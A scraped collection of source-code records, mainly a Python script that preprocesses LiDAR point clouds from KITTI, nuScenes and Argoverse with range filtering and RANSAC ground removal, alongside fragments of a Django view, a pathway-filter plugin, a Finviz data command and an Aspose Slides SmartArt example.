0:\n messages.info(request, f'No coupouns recieved till now.')\n\n context = {\n 'post': post,\n\n }\n return render(request, 'home/rewards.html', context)","repo_name":"pranita7/SOAD_Project","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9928182920","text":"import sys\n#import numpy\n#from plugins.CSV2GML.CSV2GMLPlugin import *\nfrom CSV2GML.CSV2GMLPlugin import *\nimport PyPluMA\n\n\nclass FilterPathwayPlugin(CSV2GMLPlugin):\n def input(self, filename):\n # Format expected:\n # correlationfile <somefile.csv>\n # pathwayfile <somefile.txt>\n thefile = open(filename, 'r')\n for line in thefile:\n myline = line.strip()\n entries = myline.split('\\t')\n if (entries[0] == 'correlationfile'):\n self.myfile = PyPluMA.prefix()+\"/\"+entries[1]\n elif (entries[0] == 'pathwayfile'):\n self.mypathways = PyPluMA.prefix()+\"/\"+entries[1]\n # Ignore everything else\n\n def run(self):\n # Read CSV file\n filestuff = open(self.myfile, 'r')\n self.firstline = filestuff.readline().strip()\n self.bacteria = self.firstline.split(',')\n if (self.bacteria.count('\\\"\\\"') != 0):\n self.bacteria.remove('\\\"\\\"')\n self.n = len(self.bacteria)\n self.ADJ = []\n i = 0\n for line in filestuff:\n contents = line.split(',')\n self.ADJ.append([])\n for j in range(self.n):\n value = float(contents[j+1])\n self.ADJ[i].append(value)\n i += 1\n # Read Pathways file\n self.keeplines = []\n pathwaystuff = open(self.mypathways, 'r')\n for line in pathwaystuff:\n myline = line.strip()\n myline = myline[myline.find('INVOLVES:')+9:]\n elements = myline.split('\\t')\n while (elements.count('') != 0):\n elements.remove('')\n bioelements = []\n for item in elements:\n for j in range(len(self.bacteria)):\n if (item[0] == 'X' and item[1].isdigit()):\n if (self.bacteria[j] == item or \n self.bacteria[j] == '\"'+item+'\"'): #Exactly matching metabolite\n bioelements.append(j)\n elif (self.bacteria[j].find(item) != -1): #Containing bateria name\n bioelements.append(j)\n #print \"FOUND BACTERIA: \", item, \" AND \", self.bacteria[j]\n \n # Look for at least one edge with two bioelements\n keep = []\n for j in range(len(bioelements)):\n keep.append(False)\n flag = False\n for j in range(len(bioelements)):\n for k in range(j+1, len(bioelements)):\n if (self.ADJ[bioelements[j]][bioelements[k]] != 0):\n keep[j] = True\n keep[k] = True\n flag = True\n if (flag):\n myline2 = line.strip()\n linetokeep = myline2[:myline2.find('INVOLVES:')+9]\n for j in range(len(bioelements)):\n if keep[j]:\n linetokeep += '\\t' + self.bacteria[bioelements[j]]\n linetokeep += '\\n'\n self.keeplines.append(linetokeep)\n #for j in range(len(bioelements)):\n # for k in range(len(bioelements)):\n # self.ADJ2[bioelements[j]][bioelements[k]] = 1\n\n #for i in range(self.n):\n # for j in range(self.n):\n # self.ADJ[i][j] *= self.ADJ2[i][j]\n\n\n def output(self, filename):\n filestuff2 = open(filename, 'w')\n for line in self.keeplines:\n filestuff2.write(line)\n #filestuff2.write(self.firstline+\"\\n\")\n\n #for i in range(self.n):\n # filestuff2.write(self.bacteria[i]+',')\n # for j in range(self.n):\n # filestuff2.write(str(self.ADJ[i][j]))\n # if (j < self.n-1):\n # filestuff2.write(\",\")\n # else:\n # filestuff2.write(\"\\n\")\n\n\n\n","repo_name":"movingpictures83/FilterPathway","sub_path":"FilterPathwayPlugin.py","file_name":"FilterPathwayPlugin.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22603016378","text":"import os\nimport numpy as np\nimport glob\nimport argparse\nfrom tqdm import tqdm\nfrom nuscenes import NuScenes\nfrom pyquaternion import Quaternion\nimport av2.utils.io as io_utils\n\ndef parse_arg():\n parser = argparse.ArgumentParser(description=\"Preprocess Parameter\")\n parser.add_argument('--root', type=str, default='', help='Dataset path.')\n parser.add_argument('--save_path', type=str, default='', help='Path to save processed dataset')\n parser.add_argument('--scenes_list', type=str, default='', help='Path of the scene list to be used in the dataset.')\n parser.add_argument('--dataset', type=str, default='', help='which dataset')\n parser.add_argument('--min_dist', type=float, default=3.0, help='Points < Min dist will be removed.')\n parser.add_argument('--max_dist', type=float, default=50.0, help='Points > Max dist will be removed.')\n parser.add_argument('--max_height', type=float, default=4.0, help='Points > Max height will be removed.')\n parser.add_argument('--remove', action='store_true', help='whether rm')\n args = parser.parse_args()\n\n return args\n\n\ndef my_ransac(data,\n distance_threshold=0.3,\n P=0.99,\n sample_size=3,\n max_iterations=10000,\n ):\n \"\"\"\n :param data:\n :param sample_size:\n :param P :\n :param distance_threshold:\n :param max_iterations:\n :return:\n \"\"\"\n # np.random.seed(12345)\n random.seed(12345)\n max_point_num = -999\n i = 0\n K = 10\n L_data = len(data)\n R_L = range(L_data)\n\n while i < K:\n s3 = random.sample(R_L, sample_size)\n\n if abs(data[s3[0],1] - data[s3[1],1]) < 3:\n continue\n \n coeffs = estimate_plane(data[s3,:], normalize=False)\n if coeffs is None:\n continue\n\n r = np.sqrt(coeffs[0]**2 + coeffs[1]**2 + coeffs[2]**2 )\n d = np.divide(np.abs(np.matmul(coeffs[:3], data.T) + coeffs[3]) , r)\n d_filt = np.array(d < distance_threshold)\n near_point_num = np.sum(d_filt,axis=0)\n\n if near_point_num > max_point_num:\n max_point_num = near_point_num\n\n best_model = coeffs\n best_filt = d_filt\n\n w = near_point_num / L_data\n\n wn = np.power(w, 3)\n p_no_outliers = 1.0 - wn\n \n K = (np.log(1-P) / np.log(p_no_outliers))\n\n i += 1\n if i > max_iterations:\n print(' RANSAC reached the maximum number of trials.')\n break\n\n return np.argwhere(best_filt).flatten(), best_model\n\n\ndef estimate_plane(xyz, normalize=True):\n \"\"\"\n :param xyz: 3*3 array\n x1 y1 z1\n x2 y2 z2\n x3 y3 z3\n :return: a b c d\n model_coefficients.resize (4);\n model_coefficients[0] = p1p0[1] * p2p0[2] - p1p0[2] * p2p0[1];\n model_coefficients[1] = p1p0[2] * p2p0[0] - p1p0[0] * p2p0[2];\n model_coefficients[2] = p1p0[0] * p2p0[1] - p1p0[1] * p2p0[0];\n model_coefficients[3] = 0;\n // Normalize\n model_coefficients.normalize ();\n // ... + d = 0\n model_coefficients[3] = -1 * (model_coefficients.template head<4>().dot (p0.matrix ()));\n \"\"\"\n vector1 = xyz[1,:] - xyz[0,:]\n vector2 = xyz[2,:] - xyz[0,:]\n\n if not np.all(vector1):\n print('will divide by zero..')\n return None\n dy1dy2 = vector2 / vector1\n\n if not ((dy1dy2[0] != dy1dy2[1]) or (dy1dy2[2] != dy1dy2[1])):\n return None\n\n a = (vector1[1]*vector2[2]) - (vector1[2]*vector2[1])\n b = (vector1[2]*vector2[0]) - (vector1[0]*vector2[2])\n c = (vector1[0]*vector2[1]) - (vector1[1]*vector2[0])\n # normalize\n if normalize:\n r = np.sqrt(a ** 2 + b ** 2 + c ** 2)\n a = a / r\n b = b / r\n c = c / r\n d = -(a*xyz[0,0] + b*xyz[0,1] + c*xyz[0,2])\n # return a,b,c,d\n return np.array([a,b,c,d])\n\n\nclass PreprocessNuscenes:\n def __init__(self, root, save_path, scenes_list, min_dist = 3.0, max_dist = 50.0, max_height = 4.0):\n self.min_dist = min_dist\n self.max_dist = max_dist\n self.max_height = max_height\n self.root = root\n self.save_path = save_path\n self.scenes = self.read_scene_list(scenes_list) # scene-0001 ...\n self.max_points = 0\n self.min_points = 10**10\n self.save_processed()\n \n \n def read_scene_list(self, scenes_list):\n # read .txt file containing train/val scene number\n scenes = []\n with open(scenes_list, 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n')\n scenes.append(line)\n return scenes\n\n def load_calibrated_para(self, cur_scene, filename):\n for scene in self.nusc.scene:\n if scene['name'] == cur_scene:\n start_sample_rec = self.nusc.get('sample', scene['first_sample_token'])\n sd_rec = self.nusc.get('sample_data', start_sample_rec['data']['LIDAR_TOP'])\n\n # Make list of frames\n cur_sd_rec = sd_rec\n sd_tokens = []\n sd_tokens.append(cur_sd_rec['token'])\n while cur_sd_rec['next'] != '':\n cur_sd_rec = self.nusc.get('sample_data', cur_sd_rec['next'])\n sd_tokens.append(cur_sd_rec['token'])\n if cur_sd_rec['filename'] == filename:\n break\n break\n\n sc_rec = self.nusc.get('sample_data', sd_tokens[-1])\n lidar_token = sc_rec['token']\n lidar_rec = self.nusc.get('sample_data', lidar_token)\n calibrated = self.nusc.get('calibrated_sensor', lidar_rec['calibrated_sensor_token'])\n rot = np.array(calibrated['rotation'])\n trl = np.array(calibrated['translation'])\n return rot, trl\n \n def load_scene_frames(self, scene):\n # load frames of the scene and return file list [num_scene_frames]\n file = os.path.join('./scene-split', scene + '.txt')\n timestamps = []\n filenames = []\n with open(file) as f:\n for line in f.readlines():\n line = line.strip('\\n').split(' ')\n filename = line[0]\n timestamp = float(line[1])\n filenames.append(filename)\n timestamps.append(timestamp)\n rot, trl = self.load_calibrated_para(scene, filename)\n return timestamps, filenames, rot, trl # rot and trl is consitent within a scene\n\n def save_processed(self):\n file_path = os.path.join(self.root, 'sweeps', 'LIDAR_TOP')\n idx = 1\n\n for scene in tqdm(self.scenes):\n print(scene)\n if idx < 81:\n print(\"skip\", idx)\n idx += 1\n continue\n print(\"begin\", idx)\n self.nusc = NuScenes(version = 'v1.0-trainval', dataroot=self.root, verbose=True)\n timestamps, filenames, rot, trl = self.load_scene_frames(scene)\n fn_times = []\n scene_save_path = os.path.join(self.save_path, 'scene-split', scene + '.txt')\n for i in tqdm(range(len(filenames))):\n # load .pcd data\n pc_path = file_path + '/' + filenames[i]\n data_save_path = os.path.join(self.save_path, 'sweeps', 'LIDAR_TOP', filenames[i])\n # print(pc_path)\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1)\n if pc_raw.shape[0] % 5 == 0:\n pc_raw = pc_raw.reshape([-1, 5])[:, :4]\n else:\n pc_raw = pc_raw.reshape([-1,4])\n # remove ego car, ground, and max_dist, max_height\n print(\"before rm\", pc_raw.shape[0])\n # rm_min_and_max_dist\n print(\"----rm_min_and_max_dist----\")\n pc_raw[:, :3] = np.dot(pc_raw[:, :3], Quaternion(rot).rotation_matrix)\n for j in range(3):\n pc_raw[:, j] = pc_raw[:, j] + trl[j]\n dist_origin = np.sqrt(np.sum(pc_raw[:, :3] ** 2, axis = 1))\n keep = np.logical_and(self.min_dist <= dist_origin, dist_origin <= self.max_dist)\n pc_raw = pc_raw[keep]\n print(\"points_num\", pc_raw.shape[0])\n\n # rm max_height and ground\n print(\"----rm max_height and ground----\")\n # pc_raw = pc_raw[pc_raw[:, 2] > self.rm_thre]\n indices, _ = my_ransac(pc_raw[:, :3])\n print(indices)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height]\n print(\"after rm\", pc_raw.shape)\n fn_times.append(filenames[i] + ' ' + str(timestamps[i]))\n \n pc_raw.tofile(data_save_path)\n print(pc_raw.shape)\n num = pc_raw.shape[0]\n if num < self.min_points:\n self.min_points = num\n if num > self.max_points:\n self.max_points = num\n\n max_h = np.max(pc_raw[:, 2])\n min_h = np.min(pc_raw[:, 2])\n print(\"height\", min_h, max_h)\n print(scene_save_path)\n with open(scene_save_path, \"w\") as f:\n for line in fn_times:\n f.write(line +'\\n')\n print(\"max_p\", self.max_points)\n print(\"min_p\", self.min_points)\n return\n\nclass PreprocessKitti:\n def __init__(self, root, save_path, seq, min_dist = 3.0, max_dist = 50.0, max_height = 4.0):\n self.min_dist = min_dist\n self.max_dist = max_dist\n self.max_height = max_height\n self.root = root\n self.save_path = save_path\n self.seq = seq\n self.velodynes = self.read_seq_velodyne() # scene-0001 ...\n self.max_points = 0\n self.min_points = 10**10\n self.max_height = 0\n self.min_height = 0\n self.save_processed()\n\n def read_seq_velodyne(self):\n # use seq00 for train in general and seq01-10 for validation\n velodyne_path = os.path.join(self.root, \"data_odometry_velodyne\", \"dataset\", \"sequences\", self.seq, \"velodyne\")\n seq_path_list = glob.glob(os.path.join(velodyne_path, '*.bin'))\n seq_path_list = sorted(seq_path_list)\n return seq_path_list\n\n def save_processed(self):\n\n for pc_path in tqdm(self.velodynes):\n print(pc_path)\n if not os.path.exists(os.path.join(self.save_path, self.seq)):\n os.mkdir(os.path.join(self.save_path, self.seq))\n if not os.path.exists(os.path.join(self.save_path, self.seq, \"velodyne\")):\n os.mkdir(os.path.join(self.save_path, self.seq, \"velodyne\"))\n save_path = os.path.join(self.save_path, self.seq, \"velodyne\", pc_path[-10:])\n print(save_path)\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1).reshape([-1, 4])\n\n # remove ego car, ground, and max_dist, max_height\n print(\"before rm\", pc_raw.shape[0])\n # rm_min_and_max_dist\n print(\"----rm_min_and_max_dist----\")\n dist_origin = np.sqrt(np.sum(pc_raw[:, :3] ** 2, axis = 1))\n keep = np.logical_and(self.min_dist <= dist_origin, dist_origin <= self.max_dist)\n pc_raw = pc_raw[keep]\n print(\"points_num\", pc_raw.shape[0])\n\n # rm max_height and ground\n print(\"----rm max_height and ground----\")\n indices, _ = my_ransac(pc_raw[:, :3])\n print(indices)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height]\n print(\"after rm\", pc_raw.shape)\n \n pc_raw.tofile(save_path)\n num = pc_raw.shape[0]\n if num < self.min_points:\n self.min_points = num\n if num > self.max_points:\n self.max_points = num\n\n self.max_height = max(np.max(pc_raw[:, 2]), self.max_height)\n self.min_height = min(np.min(pc_raw[:, 2]), self.min_height)\n\n print(\"points num: [\", self.min_points, \",\", self.max_points, \"]\")\n print(\"points height: [\", self.min_height, \",\", self.max_height, \"]\")\n return\n\n\nclass PreprocessNonlinear:\n def __init__(self, root, scene_dir, save_path, remove = False, min_dist = 3.0, max_dist = 80.0, min_height = -5.0, max_height = 5.0):\n self.root = root\n self.scene_dir = scene_dir\n self.save_path = save_path\n self.remove = remove\n self.min_dist = min_dist\n self.max_dist = max_dist\n self.min_height = min_height\n self.max_height = max_height\n self.velodynes = self.read_sample_velodyne() \n self.max_for_dataset = 0\n self.max_x = 0\n self.max_y = 0\n self.max_z = 0\n \n \n def read_sample_velodyne(self):\n scene_list = glob.glob(os.path.join(self.scene_dir, '*.txt'))\n scene_list = sorted(scene_list)\n velo_list = []\n for scene in scene_list:\n with open(scene, 'r') as f:\n for line in f.readlines():\n line = line.strip('\\n').split(' ')\n velo_list.append(line)\n return velo_list # [nsample, 4+interval-1]\n \n def normalize(self, pc, max_for_dataset):\n l = pc.shape[0]\n centroid = np.mean(pc, axis=0)\n pc = pc - centroid\n m = max_for_dataset\n pc = pc / m\n return pc\n\n def rm_range(self, pc_raw, min_dist, max_dist, min_height, max_height):\n dist_origin = np.sqrt(np.sum(pc_raw[:, :3] ** 2, axis = 1))\n keep = np.logical_and(min_dist <= dist_origin, dist_origin <= max_dist)\n pc_raw = pc_raw[keep]\n pc_raw = pc_raw[pc_raw[:, 2] <= max_height]\n pc_raw = pc_raw[pc_raw[:, 2] >= min_height]\n return pc_raw\n\n\n def save_processed_kitti(self):\n count = 0\n p = set()\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n name = '_'.join([self.velodynes[i][j].split('/')[-3], self.velodynes[i][j].split('/')[-1]])\n p.add(name)\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n pc_path = os.path.join(self.root, self.velodynes[i][j])\n print(pc_path)\n name = '_'.join([self.velodynes[i][j].split('/')[-3], self.velodynes[i][j].split('/')[-1]])\n print(name)\n if not os.path.exists(self.save_path):\n os.mkdir(self.save_path)\n save_path = os.path.join(self.save_path, name)\n print(save_path)\n\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1).reshape([-1, 4])[:, :3]\n print(\"==pc_raw==\", pc_raw.shape)\n print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n pc_raw = self.rm_range(pc_raw, self.min_dist, self.max_dist, self.min_height, self.max_height)\n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==max_dist==\", self.max_dist, \"|| pc_rm:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n self.max_for_dataset = max(np.max(np.abs(pc_raw)).item(), self.max_for_dataset)\n self.max_x = max(np.max(np.abs(pc_raw[:, 0])).item(), self.max_x)\n self.max_y = max(np.max(np.abs(pc_raw[:, 1])).item(), self.max_y)\n self.max_z = max(np.max(np.abs(pc_raw[:, 2])).item(), self.max_z)\n\n if self.remove:\n # rm ground\n print(\"----rm ground----\")\n pc_raw = pc_raw[pc_raw[:, 2] >= -1.4] \n print(\"==rm ground==\" \"pc_rm_ground:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(pc_raw.shape)\n # pc_raw = self.normalize(pc_raw, max_for_dataset=81.15216827392578)\n # print(\"norm_pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n if not os.path.isfile(save_path):\n count += 1\n pc_raw.tofile(save_path)\n \n names_txt_path = os.path.join(self.save_path, \"scene_list\")\n if not os.path.exists(names_txt_path):\n os.mkdir(names_txt_path)\n with open(os.path.join(names_txt_path, \"scene_list.txt\"), 'a') as f:\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])-1):\n name = '_'.join([self.velodynes[i][j].split('/')[-3], self.velodynes[i][j].split('/')[-1]])\n f.write(name + ' ')\n name = '_'.join([self.velodynes[i][-1].split('/')[-3], self.velodynes[i][-1].split('/')[-1]])\n f.write(name + '\\n')\n print(\"====dataset range====\")\n print(\"max_for_kitti: \", self.max_for_dataset)\n print(\"max_x for kitti:\", self.max_x)\n print(\"max_y for kitti:\", self.max_y)\n print(\"max_z for kitti:\", self.max_z)\n print(\"file to write: \", count)\n print(\"file should be written: \", len(p))\n assert len(p) == count\n\n\n def save_processed_nuscenes(self):\n count = 0\n p = set()\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n name = self.velodynes[i][j].split('/')[-1]\n p.add(name)\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n pc_path = os.path.join(self.root, self.velodynes[i][j])\n print(pc_path)\n name = self.velodynes[i][j].split('/')[-1]\n save_path = os.path.join(self.save_path, name)\n print(save_path)\n pc_raw = np.fromfile(pc_path, dtype = np.float32, count = -1)\n if not pc_raw.shape[0] % 5:\n pc_raw = pc_raw.reshape(-1, 5)[:, :3]\n else:\n pc_raw = pc_raw.reshape(-1, 4)[:, :3]\n # print(pc_raw.shape)\n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==pc_raw==\", pc_raw.shape)\n print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n pc_raw = self.rm_range(pc_raw, self.min_dist, self.max_dist, self.min_height, self.max_height)\n print(\"==max_dist==\", self.max_dist, \"|| pc_rm:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n self.max_for_dataset = max(np.max(np.abs(pc_raw)).item(), self.max_for_dataset)\n self.max_x = max(np.max(np.abs(pc_raw[:, 0])).item(), self.max_x)\n self.max_y = max(np.max(np.abs(pc_raw[:, 1])).item(), self.max_y)\n self.max_z = max(np.max(np.abs(pc_raw[:, 2])).item(), self.max_z)\n\n\n if self.remove:\n # rm ground\n print(\"----rm ground----\")\n indices, _ = my_ransac(pc_raw)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height] \n print(\"==rm ground==\" \"pc_rm_ground:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(pc_raw.shape)\n # pc_raw = self.normalize(pc_raw, max_for_dataset = 105.2951431274414)\n # print(\"norm_pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n if not os.path.isfile(save_path):\n count += 1\n pc_raw.tofile(save_path)\n \n names_txt_path = os.path.join(self.save_path, \"scene_list\")\n if not os.path.exists(names_txt_path):\n os.mkdir(names_txt_path)\n with open(os.path.join(names_txt_path, \"scene_list.txt\"), 'a') as f:\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0]) - 1):\n name = self.velodynes[i][j].split('/')[-1]\n f.write(name + ' ')\n name = self.velodynes[i][-1].split('/')[-1]\n f.write(name + '\\n')\n print(\"max_for_nscs: \", self.max_for_dataset)\n print(\"max_x for nscs:\", self.max_x)\n print(\"max_y for nscs:\", self.max_y)\n print(\"max_z for nscs:\", self.max_z)\n print(\"file to write: \", count)\n print(\"file should be written:\", len(p))\n assert len(p) == count\n \n\n def save_processed_argos(self):\n count = 0\n p = set()\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n name = self.velodynes[i][j].split('/')[-1]\n name = name.split('.')[0]\n p.add(name)\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])):\n pc_path = os.path.join(self.root, self.velodynes[i][j])\n print(pc_path)\n name = self.velodynes[i][j].split('/')[-1]\n name = name.split('.')[0]\n save_path = os.path.join(self.save_path, name + '.bin')\n print(save_path)\n pc_raw = io_utils.read_lidar_sweep(pc_path, attrib_spec=\"xyz\")\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n pc_raw = pc_raw.reshape(-1, 3)\n # ar = np.ones((pc_raw.shape[0], 1))\n # pc_raw = np.hstack((pc_raw, ar)) \n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==pc_raw==\", pc_raw.shape)\n print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n \n pc_raw = self.rm_range(pc_raw, self.min_dist, self.max_dist, self.min_height, self.max_height)\n pc_raw = np.array(pc_raw, dtype=np.float32)\n print(\"==max_dist==\", self.max_dist, \"|| pc_rm:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n self.max_for_dataset = max(np.max(np.abs(pc_raw)).item(), self.max_for_dataset)\n self.max_x = max(np.max(np.abs(pc_raw[:, 0])).item(), self.max_x)\n self.max_y = max(np.max(np.abs(pc_raw[:, 1])).item(), self.max_y)\n self.max_z = max(np.max(np.abs(pc_raw[:, 2])).item(), self.max_z)\n\n if self.remove:\n # rm ground\n print(\"----rm ground----\")\n indices, _ = my_ransac(pc_raw)\n pc_raw[indices] = self.max_height + 1\n pc_raw = pc_raw[pc_raw[:, 2] <= self.max_height] \n print(\"==rm ground==\" \"pc_rm_ground:\", pc_raw.shape)\n print(\"pc_rm x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n print(\"pc_rm y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n print(\"pc_rm z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n\n # print(\"pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(\"pc_raw i range:\", np.min(pc_raw[:, 3]), np.max(pc_raw[:, 3]))\n # print(pc_raw.shape)\n # pc_raw = self.normalize(pc_raw, max_for_dataset=228.75)\n # print(\"norm_pc_raw: \", pc_raw)\n # print(\"pc_raw x range:\", np.min(pc_raw[:, 0]), np.max(pc_raw[:, 0]))\n # print(\"pc_raw y range:\", np.min(pc_raw[:, 1]), np.max(pc_raw[:, 1]))\n # print(\"pc_raw z range:\", np.min(pc_raw[:, 2]), np.max(pc_raw[:, 2]))\n # print(pc_raw.shape)\n if not os.path.isfile(save_path):\n count += 1\n pc_raw.tofile(save_path)\n \n names_txt_path = os.path.join(self.save_path, \"scene_list\")\n if not os.path.exists(names_txt_path):\n os.mkdir(names_txt_path)\n with open(os.path.join(names_txt_path, \"scene_list.txt\"), 'a') as f:\n for i in range(len(self.velodynes)):\n for j in range(len(self.velodynes[0])-1):\n name = self.velodynes[i][j].split('/')[-1]\n name = name.split('.')[0]\n f.write(name + '.bin ')\n name = self.velodynes[i][-1].split('/')[-1]\n name = name.split('.')[0]\n f.write(name + '.bin' + '\\n')\n print(\"max_for_argos: \", self.max_for_dataset)\n print(\"max_x for argos:\", self.max_x)\n print(\"max_y for argos:\", self.max_y)\n print(\"max_z for argos:\", self.max_z)\n print(\"file to write: \", count)\n print(\"file should be written:\", len(p))\n assert len(p) == count\n\n\n\nif __name__ == \"__main__\":\n args = parse_arg()\n # processor = PreprocessNuscenes(args.root, args.save_path, args.scenes_list, args.min_dist, args.max_dist, args.max_height)\n # processor = PreprocessKitti(args.root, args.save_path, \"00\")\n \n # this part is to deal with kitti subdataset\n if args.dataset == 'kitti':\n processor = PreprocessNonlinear(args.root, args.scenes_list ,args.save_path, remove = args.remove)\n processor.save_processed_kitti()\n\n # this part is to deal with nuscenes subdataset\n elif args.dataset == 'nscs':\n processor = PreprocessNonlinear(args.root, args.scenes_list ,args.save_path, remove = args.remove)\n processor.save_processed_nuscenes()\n\n # this part is to deal with argos subdataset\n elif args.dataset == 'argos':\n processor = PreprocessNonlinear(args.root, args.scenes_list ,args.save_path, remove = args.remove)\n processor.save_processed_argos()","repo_name":"ispc-lab/NeuralPCI","sub_path":"data/preprocess_dataset.py","file_name":"preprocess_dataset.py","file_ext":"py","file_size_in_byte":28822,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"714981407","text":"from django.core.management.base import BaseCommand, CommandParser\nfrom data.models import FinvizDataFile\n\nclass Command(BaseCommand): \n\n def handle(self, *args, **options):\n try:\n FinvizDataFile.create_finviz_data_automatically()\n except Exception as e:\n print(e)\n","repo_name":"erfanpsss/StockTradingBot","sub_path":"data/management/commands/get_finviz_data.py","file_name":"get_finviz_data.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36641467477","text":"import aspose.slides as slides\n\n\n#ExStart:AssistantNode\n# The path to the documents directory.\ndataDir = \"./examples/data/\"\noutDir = \"./examples/out/\"\n\n# Creating a presentation instance\nwith slides.Presentation(dataDir + \"smart_art_access.pptx\") as pres:\n # Traverse through every shape inside first slide\n for shape in pres.slides[0].shapes:\n \n # Check if shape is of SmartArt type\n if type(shape) is slides.smartart.SmartArt:\n \n # Traversing through all nodes of SmartArt shape\n for node in shape.all_nodes:\n \n tc = node.text_frame.text\n # Check if node is 